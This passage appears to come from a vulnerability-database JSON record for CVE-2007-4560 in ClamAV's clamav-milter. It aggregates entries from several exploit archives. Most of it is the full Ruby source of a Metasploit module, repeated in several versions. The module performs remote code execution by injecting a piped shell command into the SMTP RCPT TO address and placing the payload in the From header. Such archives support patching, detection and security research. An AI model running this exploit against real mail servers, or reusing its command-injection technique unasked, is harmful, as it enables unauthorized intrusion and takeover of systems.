Execution \n**Notes**| \n", "edition": 2, "modified": "2007-08-28T01:17:00", "published": "2007-08-28T01:17:00", "id": "D2SEC_CLAMAV", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_clamav", "title": "DSquare Exploit Pack: D2SEC_CLAMAV", "type": "d2", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:33", "description": "", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "ClamAV Milter Blackhole-Mode Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "modified": "2009-10-28T00:00:00", "id": "PACKETSTORM:82333", "href": "https://packetstormsecurity.com/files/82333/ClamAV-Milter-Blackhole-Mode-Remote-Code-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Smtp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution', \n'Description' => %q{ \nThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' \n(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. \nWhen implemented with black hole mode enabled, it is possible to execute \ncommands remotely due to an insecure popen call. \n}, \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-4560' ], \n[ 'OSVDB', '36909' ], \n[ 'BID', '25439' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/4761' ], \n], \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Aug 24 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']), \n], self.class) \nend \n \ndef exploit \n \n# ClamAV writes randomized msg.###### temporary files in a randomized \n# /tmp/clamav-#######################/ directory. This directory is \n# the clamav-milter process working directory. \n# \n# We *can* execute arbitrary code directly from 'sploit', however the \n# SMTP RFC rejects all payloads with the exception of generic CMD \n# payloads due to the IO redirects. I discovered that the 'From:' \n# header is written to this temporary file prior to the vulnerable \n# call, so we call the file itself and payload.encoded is executed. \n \nsploit = \"sh msg*\" # Execute the clamav-milter temporary file. \n \n# Create the malicious RCPT TO before connecting, \n# to make good use of the Exploit::Smtp support. \n \noldaddr = datastore['MAILTO'] \nnewaddr = oldaddr.split('@') \n \ndatastore['MAILTO'] = \"<#{newaddr[0]}+\\\"|#{sploit}\\\"@#{newaddr[1]}>\" \n \nconnect_login \n \nsock.put(\"From: ;#{payload.encoded}\\r\\n\") # We are able to stick our payload in this header \nsock.put(\".\\r\\n\") \n \n# Clean up RCPT TO afterwards \n \ndatastore['MAILTO'] = oldaddr \n \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82333/clamav_milter_blackhole.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:49:48", "description": "ClamAV Milter Blackhole-Mode Remote Code Execution. CVE-2007-4560. Remote exploit for linux platform", "published": "2010-10-09T00:00:00", "type": "exploitdb", "title": "ClamAV Milter Blackhole-Mode Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "modified": "2010-10-09T00:00:00", "id": "EDB-ID:16924", "href": "https://www.exploit-db.com/exploits/16924/", "sourceData": "##\r\n# $Id: clamav_milter_blackhole.rb 10617 2010-10-09 06:55:52Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Smtp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\r\n\t\t\t\t(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\r\n\t\t\t\tWhen implemented with black hole mode enabled, it is possible to execute\r\n\t\t\t\tcommands remotely due to an insecure popen call.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10617 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4560' ],\r\n\t\t\t\t\t[ 'OSVDB', '36909' ],\r\n\t\t\t\t\t[ 'BID', '25439' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/4761' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 24 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# ClamAV writes randomized msg.###### temporary files in a randomized\r\n\t\t# /tmp/clamav-#######################/ directory. This directory is\r\n\t\t# the clamav-milter process working directory.\r\n\t\t#\r\n\t\t# We *can* execute arbitrary code directly from 'sploit', however the\r\n\t\t# SMTP RFC rejects all payloads with the exception of generic CMD\r\n\t\t# payloads due to the IO redirects. I discovered that the 'From:'\r\n\t\t# header is written to this temporary file prior to the vulnerable\r\n\t\t# call, so we call the file itself and payload.encoded is executed.\r\n\r\n\t\tsploit = \"sh msg*\" # Execute the clamav-milter temporary file.\r\n\r\n\t\t# Create the malicious RCPT TO before connecting,\r\n\t\t# to make good use of the Msf::Exploit::Smtp support.\r\n\r\n\t\toldaddr = datastore['MAILTO']\r\n\t\tnewaddr = oldaddr.split('@')\r\n\r\n\t\tdatastore['MAILTO'] = \"<#{newaddr[0]}+\\\"|#{sploit}\\\"@#{newaddr[1]}>\"\r\n\r\n\t\tconnect_login\r\n\r\n\t\tsock.put(\"From: ;#{payload.encoded}\\r\\n\") # We are able to stick our payload in this header\r\n\t\tsock.put(\".\\r\\n\")\r\n\r\n\t\t# Clean up RCPT TO afterwards\r\n\r\n\t\tdatastore['MAILTO'] = oldaddr\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16924/"}, {"lastseen": "2016-02-01T11:30:59", "description": "ClamAV Milter. CVE-2007-4560. Remote exploits for multiple platform", "published": "2007-08-24T00:00:00", "type": "exploitdb", "title": "ClamAV Milter <= 0.92.2 - Blackhole-Mode sendmail Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "modified": "2007-08-24T00:00:00", "id": "EDB-ID:9913", "href": "https://www.exploit-db.com/exploits/9913/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Smtp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\r\n\t\t\t\t\t(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\r\n\t\t\t\t\tWhen implemented with black hole mode enabled, it is possible to execute\r\n\t\t\t\t\tcommands remotely due to an insecure popen call.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4560' ],\r\n\t\t\t\t\t[ 'OSVDB', '36909' ],\r\n\t\t\t\t\t[ 'BID', '25439' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/4761' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\t\t\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 24 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# ClamAV writes randomized msg.###### temporary files in a randomized\r\n\t\t# /tmp/clamav-#######################/ directory. This directory is\r\n\t\t# the clamav-milter process working directory.\r\n\t\t#\r\n\t\t# We *can* execute arbitrary code directly from 'sploit', however the\r\n\t\t# SMTP RFC rejects all payloads with the exception of generic CMD\r\n\t\t# payloads due to the IO redirects. I discovered that the 'From:'\r\n\t\t# header is written to this temporary file prior to the vulnerable\r\n\t\t# call, so we call the file itself and payload.encoded is executed.\r\n\r\n\t\tsploit = \"sh msg*\" # Execute the clamav-milter temporary file.\r\n\r\n\t\t# Create the malicious RCPT TO before connecting,\r\n\t\t# to make good use of the Exploit::Smtp support.\r\n\r\n\t\toldaddr = datastore['MAILTO']\r\n\t\tnewaddr = oldaddr.split('@')\r\n\r\n\t\tdatastore['MAILTO'] = \"<#{newaddr[0]}+\\\"|#{sploit}\\\"@#{newaddr[1]}>\"\r\n\r\n\t\tconnect_login\r\n\r\n\t\tsock.put(\"From: ;#{payload.encoded}\\r\\n\") # We are able to stick our payload in this header\r\n\t\tsock.put(\".\\r\\n\")\r\n\r\n\t\t# Clean up RCPT TO afterwards\r\n\r\n\t\tdatastore['MAILTO'] = oldaddr\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9913/"}], "metasploit": [{"lastseen": "2020-06-18T23:58:16", "description": "This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.\n", "published": "2008-03-17T11:51:30", "type": "metasploit", "title": "ClamAV Milter Blackhole-Mode Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/UNIX/SMTP/CLAMAV_MILTER_BLACKHOLE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Smtp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',\n 'Description' => %q{\n This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n When implemented with black hole mode enabled, it is possible to execute\n commands remotely due to an insecure popen call.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-4560' ],\n [ 'OSVDB', '36909' ],\n [ 'BID', '25439' ],\n [ 'EDB', '4761' ]\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby bash-tcp telnet',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Aug 24 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),\n ])\n end\n\n def exploit\n\n # ClamAV writes randomized msg.###### temporary files in a randomized\n # /tmp/clamav-#######################/ directory. This directory is\n # the clamav-milter process working directory.\n #\n # We *can* execute arbitrary code directly from 'sploit', however the\n # SMTP RFC rejects all payloads with the exception of generic CMD\n # payloads due to the IO redirects. I discovered that the 'From:'\n # header is written to this temporary file prior to the vulnerable\n # call, so we call the file itself and payload.encoded is executed.\n\n sploit = \"sh msg*\" # Execute the clamav-milter temporary file.\n\n # Create the malicious RCPT TO before connecting,\n # to make good use of the Msf::Exploit::Smtp support.\n\n oldaddr = datastore['MAILTO']\n newaddr = oldaddr.split('@')\n\n datastore['MAILTO'] = \"<#{newaddr[0]}+\\\"|#{sploit}\\\"@#{newaddr[1]}>\"\n\n connect_login\n\n sock.put(\"From: ;#{payload.encoded}\\r\\n\") # We are able to stick our payload in this header\n sock.put(\".\\r\\n\")\n\n # Clean up RCPT TO afterwards\n\n datastore['MAILTO'] = oldaddr\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/clamav_milter_blackhole.rb"}]}
